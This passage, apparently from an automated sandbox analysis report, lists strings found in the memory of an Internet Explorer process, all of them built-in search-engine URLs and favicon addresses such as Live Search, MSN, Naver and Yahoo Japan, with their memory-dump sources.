          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.espn.go.com/i
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/?A~
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico)x
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.interpark.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.icosI
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D690000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6B6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6B6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS5qd
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS6He
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW9d
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=IE7BOX&src=%7Breferrer:source?%7Dz-
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=IE7RE&src=%7Breferrer:source?%7D
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=MSNIE7&src=%7Breferrer:source?%7D?
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&Form=IE8SRC&src=%7Breferrer:source%7D~
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A8B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&mkt=%7BLanguage%7D&FORM=IE8SRC&src=%7Breferr
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7D&Form=IE8SRC
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7DI
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=IE-SearchBox&Form=IE8SRCY
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.lycos.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=%7BsearchTerms%7D&FORM=AS5hd
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=%7BsearchTerms%7D&FORM=AS6Cd
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW#e
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=%7BsearchTerms%7D&FORM=AS5
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=%7BsearchTerms%7D&FORM=AS6
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW
          Source: iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS5
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS6
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.nate.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.nate.com/EB
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.naver.com/SAZ
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.naver.com/favicon.ico?x
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.nifty.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.orange.co.uk/t
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.rediff.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.sify.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.sify.com/$
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico%
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.yahoo.co.jpmB
